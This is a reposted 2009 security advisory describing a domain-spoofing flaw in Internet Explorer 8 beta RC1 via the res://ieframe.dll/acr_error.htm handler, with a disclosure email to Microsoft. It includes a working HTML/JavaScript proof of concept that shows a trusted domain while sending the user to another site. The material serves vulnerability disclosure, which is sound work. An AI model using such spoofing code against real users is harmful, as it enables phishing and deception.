Internet Explorer 8 beta RC1 has a flaw that allows for domain name spoofing

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Internet Explorer 8 beta RC1 has a flaw that allows for domain name spoofing

来源：http://lostmon.blogspot.com/ 作者：Lostmon 发布时间：2009-03-06

###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################


Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)

#################
Proof of concept
#################

<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#
http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes,
location=no, directories=no, status=no, menubar=yes, scrollbars=no,
resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff
-]:..</title>

<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>

</html>


#######################################

Thnx To estrella to be my ligth
Thnx to all Lostmon Team

---------- Forwarded message ----------
From: Lostmon lords <lostmon@gmail.com>
Date: 2009/3/4
Subject: ie8 spooff the domain name in ieframe.dll wen is set to
acr_error.htm in res: uri handler
To: Microsoft Security Response Center <secure@microsoft.com>


Hello

Internet explorer 8 has a flaw that allows remote users to spooff the domain
name in ieframe.dll wen is set to acr_error.htm in res: uri handler
a remote user can compose a malicious link thats shows in domain name for
example google.com , but wen click in the link it goes to other site
(spooff)

res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site]

see attached file as a PoC.


res://ieframe.dll/acr_error.htm

I test it in windows 2003 and winxp pro&home with ie 7 and it does not work
it apears that its affects only IE8

Thnx for your time !!!!

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....



-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告